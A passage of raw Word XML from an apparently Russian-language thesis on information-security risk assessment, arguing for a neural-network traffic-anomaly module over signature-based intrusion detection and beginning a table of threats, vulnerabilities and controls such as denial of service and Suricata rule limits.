          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidRPr="00C56222">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>. Согласно этой методике, первым шагом является формирование перечня актуальных угроз и уязвимостей, которым подвержена информационная система компании.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52724E14" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00C56222" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C56222">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>При этом анализ показал, что типовые коммерческие системы обнаружения вторжений не способны эффективно обнаруживать все актуальные угрозы одновременно, поскольку они в основном основаны на сигнатурах</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="062A4536" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00C56222" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C56222">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Таким образом, единственным эффективным механизмом контроля для нейтрализации всех актуальных угроз является интеллектуальный модуль анализа сетевого трафика на основе искусственной нейронной сети, способный выявлять аномалии в поведении трафика, а не только известные сигнатуры.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42EED58C" w14:textId="672A1805" w:rsidR="00C022BB" w:rsidRPr="00C41C6A" w:rsidRDefault="00C022BB" w:rsidP="008E0171">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C022BB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>На основании проведённого анализа для каждой актуальной угрозы определены соответствующие уязвимости и механизмы контроля. Уязвимости классифицированы по степени критичности с учётом простоты их реализации нарушителем и потенциального ущерба для информационной системы. Для угроз сетевого уровня основным механизмом контроля выступает нейросетевой модуль анализа трафика, для угроз на уровне данных — криптографические меры и контроль целостности, для угроз несанкционированного доступа — механизмы аутентификации и разграничения прав доступа.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58944611" w14:textId="77777777" w:rsidR="00C022BB" w:rsidRDefault="00C022BB" w:rsidP="00C022BB">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C56222">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">В таблице </w:t>
      </w:r>
      <w:r w:rsidRPr="006D71D4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidRPr="00C56222">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> представлен перечень угроз, уязвимостей и механизмов контроля, составленный </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>н</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE6BF3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>а основе актуальных угроз.</w:t>
      </w:r>
      <w:r w:rsidRPr="00C56222">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Все уязвимости определены согласно Банку данных угроз безопасности информации</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00C56222">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Степень уязвимости оценена по критериям простоты реализации, указанным в методике.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="013418D8" w14:textId="77777777" w:rsidR="00C022BB" w:rsidRDefault="00C022BB" w:rsidP="0054172F">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DF0CE98" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="003770F2" w:rsidRDefault="008E0171" w:rsidP="00B93B26">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B93B26">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Таблица 8 – Перечень угроз</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> и уязвимостей</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9686" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1271"/>
        <w:gridCol w:w="1418"/>
        <w:gridCol w:w="1134"/>
        <w:gridCol w:w="1134"/>
        <w:gridCol w:w="1842"/>
        <w:gridCol w:w="1134"/>
        <w:gridCol w:w="1753"/>
      </w:tblGrid>
      <w:tr w:rsidR="008E0171" w:rsidRPr="00913F86" w14:paraId="7D51C519" w14:textId="77777777" w:rsidTr="0054172F">
        <w:trPr>
          <w:trHeight w:val="1346"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1271" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5A327E66" w14:textId="30002A1C" w:rsidR="008E0171" w:rsidRPr="00913F86" w:rsidRDefault="0054172F" w:rsidP="0054172F">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0054172F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>Наимено</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0054172F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve">- </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0054172F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>вание</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0054172F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve"> актива</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1418" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5E27FF72" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00913F86" w:rsidRDefault="008E0171" w:rsidP="0054172F">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Риск</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3F7FA3F0" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00913F86" w:rsidRDefault="008E0171" w:rsidP="0054172F">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Угроза</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1EC0FAC4" w14:textId="4EEBC4C0" w:rsidR="008E0171" w:rsidRPr="00913F86" w:rsidRDefault="0054172F" w:rsidP="0054172F">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0054172F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>Вероя</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>т</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0054172F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve">- </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0054172F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>ность</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0054172F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve"> угрозы</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1842" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6C60FD1A" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00913F86" w:rsidRDefault="008E0171" w:rsidP="0054172F">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Уязвимость</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5FDACEB9" w14:textId="55874DDB" w:rsidR="008E0171" w:rsidRPr="00913F86" w:rsidRDefault="008E0171" w:rsidP="0054172F">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00913F86">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>Сте</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="0054172F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
            <w:r w:rsidR="0054172F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00913F86">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>пень уязви</w:t>
            </w:r>
            <w:r w:rsidR="0054172F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
            <w:r w:rsidRPr="00913F86">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>мости</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1753" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="683967D8" w14:textId="42C2AE4A" w:rsidR="008E0171" w:rsidRPr="00913F86" w:rsidRDefault="008E0171" w:rsidP="0054172F">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Механизм контроля</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002E66B7" w:rsidRPr="00913F86" w14:paraId="67A2D402" w14:textId="77777777" w:rsidTr="0054172F">
        <w:trPr>
          <w:trHeight w:val="413"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1271" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4E8C7554" w14:textId="43932E6B" w:rsidR="002E66B7" w:rsidRPr="00913F86" w:rsidRDefault="002E66B7"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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1418" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7D7E09DA" w14:textId="00688768" w:rsidR="002E66B7" w:rsidRPr="00913F86" w:rsidRDefault="002E66B7"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="674CF770" w14:textId="451F4DAA" w:rsidR="002E66B7" w:rsidRPr="00913F86" w:rsidRDefault="002E66B7"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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0EBD7EA6" w14:textId="5CF34507" w:rsidR="002E66B7" w:rsidRPr="00913F86" w:rsidRDefault="002E66B7"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1842" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="16B05C8E" w14:textId="7BAC16B3" w:rsidR="002E66B7" w:rsidRPr="00913F86" w:rsidRDefault="002E66B7"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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="06DB7A8C" w14:textId="13EFC638" w:rsidR="002E66B7" w:rsidRPr="00913F86" w:rsidRDefault="002E66B7"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1753" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2CF900DC" w14:textId="7094091D" w:rsidR="002E66B7" w:rsidRPr="00913F86" w:rsidRDefault="002E66B7"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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E0171" w:rsidRPr="00913F86" w14:paraId="5E6497F4" w14:textId="77777777" w:rsidTr="0054172F">
        <w:trPr>
          <w:trHeight w:val="2499"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1271" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4503450C"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Сетевая доступность и инфраструктура</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1418" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="297CA5AB"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Массовый отказ в обслуживании</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2DEC4F76" w14:textId="073C8D90"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xml:space="preserve">УБИ.140 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5DB14080"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75%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1842" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="74045825"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xml:space="preserve">Недостаточная способность классических правил </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00913F86">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>Suricata</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00913F86">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
